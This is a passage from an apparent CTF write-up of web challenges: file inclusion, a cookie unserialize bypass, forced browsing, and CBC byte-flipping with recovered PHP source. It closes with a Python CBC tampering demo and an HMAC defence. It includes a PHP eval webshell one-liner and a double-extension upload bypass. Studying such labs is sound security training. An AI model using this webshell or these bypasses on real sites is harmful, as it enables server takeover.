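    return "".join(chr((c - ord(k)) % 128) for c, k in zip(raw, ks))


if __name__ == "__main__":
    print(decrypt(CHALLENGE_CIPHERTEXT))
```

Because the keystream never depends on the data, two messages encrypted under this scheme also leak their byte-wise difference, which is the usual failure of any fixed repeating key.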

File inclusion 2

Hint: file inclusion

URL: http://123.206.31.85:49166/index.php?file=hello.php

The page source starts with <!-- upload.php -->, pointing at upload.php.

Uploaded a one-line webshell with a changed extension; the upload succeeded, but neither opening it directly nor including it through the file-inclusion parameter could be connected from Caidao or AntSword.

Later changed the one-liner to:

<script language=php>echo 'a'; eval($_POST['pass']);</script>

Renamed the file a.php;.jpg, the upload succeeded, and including it printed an a. Connected with AntSword, found a file named this_is_th3_F14g_154f65sd4g35f4d6f43.txt, and its contents are the flag.

flag.php

Clicking login does nothing.

Back to the hint the challenge gives:

Hint: hint

Nothing in the page source either.

Had to go look at other people's writeups.

They all pass hint=1 via GET and the source shows up; I tried it and got:

<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center"><form method="POST" action="#"><p><input name="user" type="text" placeholder="Username"></p><p><input name="password" type="password" placeholder="Password"></p><p><input value="Login" type="button"/></p></form>
</div>
</body>
</html><?php
}
$KEY='ISecer:www.isecer.com';
?>

Not too complicated; pass a cookie, but there is a trap:

$KEY is defined at the bottom, so in the comparison above it is still undefined.

So unserialize($cookie) must return an empty value to match it.

So we pass s:0:"";

Just set the cookie ISecer=s:0:""; and that's it.

Setting it directly in Firefox didn't work, so I changed the cookie in Burp and the flag appeared.

SQL injection 2

The challenge says everything is filtered, despair? Hint: !,!=,=,+,-,^,%

Trying the username admin returns "wrong password", so the account is confirmed; now the password. Thought about brute forcing, but the password is rather long...

Fine, do it properly.

But... appending flag to the URL, http://123.206.87.240:8007/web2/flag, just downloaded the flag...

孙xx的博客 (Sun xx's blog)

No idea on this one; the challenge number seems to have changed and no writeup could be found.

Trim的日记本 (Trim's diary)

A scan with Yujian (御剑) turned up http://123.206.87.240:9002/show.php

Open it and the flag is there.

login2(SKCTF)

Hint: command execution

The target is broken; it keeps saying it cannot connect to the database.

login3(SKCTF)

Hint: boolean-based blind SQL injection

Also says it cannot connect to the database.

File upload 2 (Huxiang Cup)

The page won't open.

江湖魔头

Skipping this for now, too hard.

login4

Hint: CBC byte-flipping attack

A login form. Random credentials say I'm not the administrator; logging in as admin says the administrator doesn't need to log in. Capture the request:

The cookie contains

Cookie: PHPSESSID=geaegok09kdgpv30reekm2uvb5; user=UTw%2BPCx%2FempFfml9eypON1KVb1YjKDBlbWx3mTBbdSIVFBRhoQ%3D%3D

First look up what a CBC byte-flipping attack is.

Found a detailed post: https://blog.csdn.net/csu_vc/article/details/79619309

A Yujian scan finds an index.php.swp

On Linux, vim -r index.php.swp recovers it; the source:

<!DOCTYPE html PUBLIC "-//W4C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>Login Form</title>
<link href="static/css/style.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function () {
    $(".username").focus(function () { $(".user-icon").css("left", "-48px"); });
    $(".username").blur(function () { $(".user-icon").css("left", "0px"); });
    $(".password").focus(function () { $(".pass-icon").css("left", "-48px"); });
    $(".password").blur(function () { $(".pass-icon").css("left", "0px"); });
});
</script>
</head>
<?php
define("SECRET_KEY", file_get_contents('/root/key'));
define("METHOD", "aes-128-cbc");
session_start();

function get_random_iv()
{
    $random_iv = '';
    for ($i = 0; $i < 16; $i++) {
        $random_iv .= chr(rand(1, 255));
    }
    return $random_iv;
}

function login($info)
{
    $iv = get_random_iv();
    $plain = serialize($info);
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    $_SESSION['username'] = $info['username'];
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}

function check_login()
{
    if (isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])) {
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if ($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)) {
            $info = unserialize($plain) or die("<p>base64_decode('" . base64_encode($plain) . "') can't unserialize</p>");
            $_SESSION['username'] = $info['username'];
        } else {
            die("ERROR!");
        }
    }
}

function show_homepage()
{
    if ($_SESSION["username"] === 'admin') {
        echo '<p>Hello admin</p>';
        echo '<p>Flag is $flag</p>';
    } else {
        echo '<p>hello ' . $_SESSION['username'] . '</p>';
        echo '<p>Only admin can see flag</p>';
    }
    echo '<p><a href="loginout.php">Log out</a></p>';
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    if ($username === 'admin') {
        exit('<p>admin are not allowed to login</p>');
    } else {
        $info = array('username' => $username, 'password' => $password);
        login($info);
        show_homepage();
    }
} else {
    if (isset($_SESSION["username"])) {
        check_login();
        show_homepage();
    } else {
        echo '<body class="login-body"><div id="wrapper"><div class="user-icon"></div><div class="pass-icon"></div><form name="login-form" class="login-form" action="" method="post"><div class="header"><h1>Login Form</h1><span>Fill out the form below to login to my super awesome imaginary control panel.</span></div><div class="content">
<input name="username" type="text" class="input username" value="Username" onfocus="this.value=\'\'" /><input name="password" type="password" class="input password" value="Password" onfocus="this.value=\'\'" /></div><div class="footer"><input type="submit" name="submit" value="Login" class="button" /></div></form></div></body>';
    }
}
?>
</html>
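check_login() above decrypts the cookie and trusts whatever comes out: there is no integrity check on iv or cipher, so a modified cookie still decrypts to something, and that something is accepted. That is the property a CBC byte-flipping attack relies on. As an added example (not code from the challenge or the write-up), the Python below runs CBC mode over a toy 16-byte permutation that stands in for AES (the toy cipher, the keys and the plaintext are constructed), shows that changing one IV byte changes exactly the corresponding byte of the first plaintext block while the rest decrypts cleanly, and adds the encrypt-then-MAC check (seal and open_sealed, hypothetical names) that would make the cookie tamper-evident.

```python
import hashlib
import hmac
import os

BLOCK = 16  # block size of aes-128-cbc, which the toy permutation below imitates


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy keyed permutation on one 16-byte block. NOT a cipher: it only stands in
    for AES so that CBC mode can run offline. The malleability shown below is a
    property of CBC mode and does not depend on the block cipher underneath."""
    return bytes(((b + key[i]) & 0xFF) ^ key[15 - i] for i, b in enumerate(block))


def toy_block_decrypt(key: bytes, block: bytes) -> bytes:
    return bytes(((b ^ key[15 - i]) - key[i]) & 0xFF for i, b in enumerate(block))


def pad(data: bytes) -> bytes:
    """PKCS#7 padding, which openssl_encrypt() applies by default."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    data, out, prev = pad(plaintext), b"", iv
    for i in range(0, len(data), BLOCK):
        prev = toy_block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += xor(toy_block_decrypt(key, blk), prev)  # P_i = D(C_i) XOR C_(i-1), with C_0 = iv
        prev = blk
    return unpad(out)


def tamper_iv(iv: bytes, index: int, delta: int) -> bytes:
    """XOR one IV byte. Since P_1 = D(C_1) XOR iv, the same byte of the first
    plaintext block is XORed with the same delta and no other byte changes.
    This is the unauthenticated case the challenge's check_login() is in."""
    b = bytearray(iv)
    b[index] ^= delta
    return bytes(b)


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes):
    """Encrypt-then-MAC: the tag binds iv and ciphertext together."""
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(enc_key, iv, plaintext)
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return iv, ct, tag


def open_sealed(enc_key: bytes, mac_key: bytes, iv: bytes, ct: bytes, tag: bytes):
    """The check check_login() lacks: verify the tag first, decrypt only if it matches."""
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return cbc_decrypt(enc_key, iv, ct)


if __name__ == "__main__":
    enc_key, mac_key = bytes(range(16)), b"constructed-mac-key"   # constructed demo keys
    cookie = b"user=guest;role=user"                               # constructed plaintext
    iv, ct, tag = seal(enc_key, mac_key, cookie)
    bad_iv = tamper_iv(iv, 5, ord("g") ^ ord("a"))
    print(cbc_decrypt(enc_key, bad_iv, ct))                 # plain CBC accepts the altered cookie
    print(open_sealed(enc_key, mac_key, bad_iv, ct, tag))   # None: the MAC rejects it
```

The tag must be checked with a constant-time comparison and before any decryption or unserialize() call; verifying after decrypting would still hand attacker-controlled bytes to unserialize(), which is a second problem in the challenge code independent of CBC.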
